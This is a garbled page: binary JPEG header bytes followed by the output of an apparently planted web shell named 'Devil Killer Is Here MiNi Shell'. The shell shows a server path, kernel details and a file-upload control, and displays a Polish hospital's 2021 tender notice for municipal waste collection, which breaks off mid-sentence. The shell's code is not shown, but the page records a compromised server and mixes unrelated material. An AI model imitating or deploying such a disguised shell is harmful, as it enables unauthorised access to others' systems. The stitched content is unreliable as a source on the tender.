JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211117/0027222501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „ODBIÓR I PRZEKAZYWANIE DO ZAGOSPODAROWANIA NIESEGREGOWANYCH (ZMIESZANYCH) ODPADÓW KOMUNALNYCH” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ OPIEKI ZDROWOTNEJ W OŚWIĘCIMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304409</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">WYSOKIE BRZEGI 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpitaloswiecim.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szpitaloswiecim.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ODBIÓR I PRZEKAZYWANIE DO ZAGOSPODAROWANIA NIESEGREGOWANYCH (ZMIESZANYCH) ODPADÓW KOMUNALNYCH” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1fe7d449-46be-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00272225</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003594/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Usługa odbioru i przekazywania do zagospodarowania niesegregowanych (zmieszanych) odpadów komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą<br/>elektroniczną przy użyciu Platformy Zakupowej Marke tplanet OnePlace na portalu<br/>https://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy użyciu platformy, opisane zostały w Instrukcji dla wykonawcy pod adresem:<br/>https://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet w zakładce: Regulacje i procedury<br/>procesu zakupowego/Deklaracja dostępności.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z portalu Marketplanet OnePlace, określone w Instrukcji dla wykonawcy<br/>oraz zobowiązuje się korzystając z portalu Marketplanet OnePlace przestrzegać postanowień tej<br/>instrukcji.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia<br/>i wycofania oferty oraz komunikacji wynosi: 100 MB.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>zamowienia@szpitaloswiecim.pl.<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane<br/>są przez Wykonawcę za pośrednictwem Platformy Zakupowej Marketplanet OnePlace lub za pomocą<br/>poczty elektronicznej, na adres email: zamowienia@szpitaloswiecim.pl. Szczególne wymagania<br/>określone w Dziale XV SWZ obowiązują w przypadku składania ofert.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452),</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej RODO,<br/>informuję, iż:<br/>1. Administratorem jest ZOZ w Oświęcimiu, ul. Wysokie Brzegi 4, 32-600 Oświęcim<br/>2. Dane kontaktowe Inspektor Ochrony Danych:<br/>W ZOZ w Oświęcimiu, ul. Wysokie Brzegi 4, 32-600 Oświęcim został wyznaczony Inspektor Ochrony<br/>Danych, dane kontaktowe: tel. 33 8448 487, adres email: iod@szpitaloswiecim.pl;<br/>3. Cele przetwarzania danych osobowych:<br/>Dane osobowe są zbierane w celu niezbędnym dla udostępniania dokumentacji dotyczącej<br/>prowadzenia postępowań o udzielenie zamówień publicznych, w związku z postępowaniem o<br/>udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/<br/>prowadzonym w trybie podstawowym, na podstawie art. 275 pkt 1 ustawy Pzp;<br/>4. Podstawa prawna przetwarzania danych osobowych:<br/>Przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze<br/>(podstawa prawna z art. 6 ust. 1 lit. c RODO)<br/>Przetwarzanie danych osobowych dotyczących wyroków skazujących i naruszeń prawa (podstawa<br/>prawna z art. 10 RODO)<br/>Ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych oraz wydane na jej podstawie akty<br/>wykonawcze.<br/>5. Informacje o odbiorcach danych osobowych:<br/>Odbiorcami Pani/Pana danych osobowych są osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych. Ponadto odbiorcami danych zawartych w dokumentach postępowania mogą<br/>być podmioty, z którymi administrator zawarł umowy lub porozumienie na korzystanie z<br/>udostępnianych przez nie systemów informatycznych, przy czym zakres przekazanych danych tym<br/>odbiorcom ograniczony jest do możliwości zapoznania się z tymi danymi w związku ze świadczeniem<br/>usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania<br/>poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/>6. Okres, przez który dane osobowe będą przechowywane:<br/>Dane osobowe są przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy.<br/>7. Uprawnienia z art. 15-21 RODO:<br/>Przysługują Pani/Panu następujące uprawnienia:<br/>− prawo dostępu do swoich danych osobowych oraz otrzymania ich kopii;<br/>− prawo do sprostowania swoich danych osobowych ;<br/>− prawo żądania od administratora ograniczenia przetwarzania danych osobowych, z wyjątkiem<br/>sytuacji określonych w przepisach prawa;<br/>8. Prawo do wniesienia skargi:<br/>Ma Pan/Pani prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, iż przetwarzanie Pani/Pana danych osobowych przez Administratora narusza przepisy<br/>RODO.<br/>9. Obowiązek podania danych<br/>Podanie danych osobowych jest wymogiem ustawowym. Konsekwencje niepodania określonych<br/>danych wynikają z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>10. Informacje o zautomatyzowanym podejmowaniu decyzji Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany, w tym w oparciu o profilowanie.<br/>11. Informacja o ograniczeniach w realizacji praw określonych w art. 15, 16 i 18 rozporządzenia<br/>2016/679<br/>Pełne informacje dotyczące RODO opisane zostały w dziale XXII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOZ.DZP.271.4.X.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 156584,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest odbiór i przekazywanie do zagospodarowania niesegregowanych<br/>(zmieszanych) odpadów komunalnych oraz odbiór i przekazywanie do instalacji odzysku lub<br/>unieszkodliwiania selektywnie zebranych odpadów komunalnych – zgodnie z zapisami w<br/>formularzu cenowym- zał. nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wskazany poniżej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia publicznego ubiegać się mogą Wykonawcy, którzy<br/>spełniają warunki udziału w postępowaniu w zakresie:<br/>1.1. uprawnień do prowadzenia określonej działalności zawodowej: Zamawiający stwierdzi, iż<br/>Wykonawca spełnił warunek udziału w postępowaniu jeśli wykaże on, że posiada on, zgodnie z<br/>oświadczeniem nr 3a do SWZ :<br/>a. Aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania<br/>odpadów komunalnych od właścicieli nieruchomości na terenie Miasta i Gminy Oświęcim,<br/>prowadzonego przez Prezydenta Miasta Oświęcim.<br/>b. Wpis do rejestru, o którym mowa w art. 49 ustawy o odpadach z dnia 14.12.2012 r. (t.j. Dz. U.<br/>2021 r. poz. 779).<br/>c. Wpis do rejestru BDO stanowiącego integralną część bazy danych o produktach i<br/>opakowaniach oraz gospodarcze odpadami, o której mowa w ustawie z dnia 14 grudnia 2012r. o<br/>odpadach (t.j. Dz. U. 2021 r., poz. 779) w zakresie podmiotu transportującego odpady.<br/>1.2. Zdolności technicznej lub zawodowej - na podstawie złożonego oświadczenia<br/>• Oświadczenie Wykonawcy, że dysponuje co najmniej:<br/>- 1 pojazdem do odbioru niesegregowanych (zmieszanych) odpadów komunalnych, wyposażony<br/>w legalizowaną wagę samochodową (dowodem legalizacji wagi, na której ważone będą odpady<br/>może być specjalna naklejka holograficzna umieszczona na wadze w pobliżu tabliczki<br/>znamionowej, zawierająca wymagane przepisami prawa oznaczenia lub kserokopia dokumentu<br/>potwierdzającego legalizację wagi podpisana za zgodność z oryginałem) i drukarkę<br/>umożliwiającą wydruk potwierdzenia wagi, spełniający wymagania normy emisji spalin co<br/>najmniej EURO 4, posiadający mechanizm do załadunku i opróżniania pojemników o<br/>pojemności 240L-5m3 zgodnie z załącznikiem nr 3a do SWZ.<br/>* Dokumenty potwierdzające, że posiadane przez Wykonawcę pojazdy spełniają normy emisji<br/>spalin deklarowane przez Wykonawcę (o ile spełnienie normy nie wynika z treści dowodów<br/>rejestracyjnych).<br/>- 1 pojazdem do odbioru odpadów segregowanych, wyposażony w HDS pozwalający na<br/>opróżnianie pojemników typu &#34;dzwon&#34;, spełniający wymagania normy spalin co najmniej EURO<br/>4 zgodnie z załącznikiem nr 3a do SWZ.<br/>* Dokumenty potwierdzające, że posiadane przez Wykonawcę pojazdy spełniają normy emisji<br/>spalin deklarowane przez Wykonawcę (o ile spełnienie normy nie wynika z treści dowodów<br/>rejestracyjnych).<br/>- 1 pojazdem do odbioru odpadów zapewniający możliwość obsługi kontenerów o pojemności<br/>min. 7m3, spełniający wymagania normy emisji spalin EURO 4 - zgodnie z załącznikiem nr 3a do<br/>SWZ.<br/>* Dokumenty potwierdzające, że posiadane przez Wykonawcę pojazdy spełniają normy emisji<br/>spalin deklarowane przez Wykonawcę (o ile spełnienie normy nie wynika z treści dowodów<br/>rejestracyjnych).<br/>- Wykaz pojazdów dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją<br/>o podstawie dysponowania tymi zasobami - załącznik nr 6 do SWZ;<br/>- Kserokopie dowodów rejestracyjnych pojazdów przewidzianych do realizacji usługi<br/>wykazanych w wykazie pojazdów – zgodnie z wykazem pojazdów przedstawionym w zał. nr 6 do<br/>SWZ.<br/>- Dowód potwierdzający legalizację wagi, na której ważone będą odpady (Dowodem legalizacji<br/>wagi, na której ważone będą odpady może być specjalna naklejka holograficzna umieszczona<br/>na wadze w pobliżu tabliczki znamionowej, zawierająca wymagane przepisami prawa<br/>oznaczenia lub kserokopia potwierdzona za zgodność z odpisem dokumentu potwierdzająca legalizację wagi) – zgodnie z oświadczeniem załącznikiem nr 3a do SWZ.<br/>- Wykaz co najmniej 2 usług (zrealizowanych na kwotę co najmniej 150 000,00 zł) w zakresie<br/>niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanej w okresie<br/>ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca<br/>wykonania i podmiotów, na rzecz których usługa została wykonana należycie i prawidłowo<br/>ukończona - zgodnie z oświadczeniem w załączniku nr 3a do SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki j.w<br/>mogą być spełnione przez Wykonawców łącznie.<br/>W przypadku skorzystania z uprawnień wynikających z art. 118 ustawy PZP (DZ.U 2021 poz<br/>1129 zm.), tj. posługiwania się w celu wykazania spełnienia warunku cudzymi zasobami,<br/>Zamawiający wymaga od Wykonawcy złożenia oświadczenia, zgodnie z załącznikiem nr 3a pkt.<br/>II – Oświadczenie o spełnieniu warunków udziału w postępowaniu.<br/>*Dokumenty potwierdzające, że usługa wskazana w wykazie w oświadczeniu (zał. nr 3a do<br/>SWZ) została wykonana należycie i prawidłowo ukończona (np. referencje).<br/>2. W sytuacji spełniania warunków udziału w postępowaniu przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia zobowiązani są do dołączenia do oferty oświadczenia,<br/>z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy.<br/>Informacja dotycząca udostępnienia zasobów podmiotów udostepniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby Wykonawca w terminie<br/>określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>Zamawiający dokona oceny spełnienia przez Wykonawców wyżej wymienionych warunków na<br/>podstawie danych i informacji zawartych w oświadczeniu załączonym do oferty, zgodnie z<br/>wzorem – Załącznik nr 3a do SWZ oraz w przypadku Wykonawcy, którego oferta zostanie<br/>najwyżej oceniona na podstawie dokumentów złożonych na wezwanie Zamawiającego<br/>potwierdzających powyższe oświadczenie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesięcy przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, sporządzonym na formularzu stanowiącym załącznik nr 3 do SWZ, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka zapobiegawczego - dotyczy art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>- art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy Pzp, <br/>Pełne zapisy znajdują się w dziale IX SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej, uprawnień oraz sytuacji ekonomicznej:<br/>1) Aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania<br/>odpadów komunalnych od właścicieli nieruchomości na terenie Miasta i Gminy Oświęcim,<br/>prowadzonego przez Prezydenta Miasta Oświęcim.<br/>2) Wpis do rejestru, o którym mowa w art. 49 ustawy o odpadach z dnia 14.12.2012 r. (t.j. Dz. U. 2021<br/>r. poz. 779).<br/>3) Wpis do rejestru BDO stanowiącego integralną część bazy danych o produktach i opakowaniach<br/>oraz gospodarcze odpadami, o której mowa w ustawie z dnia 14 grudnia 2012r. o odpadach (t.j. Dz. U.<br/>2021 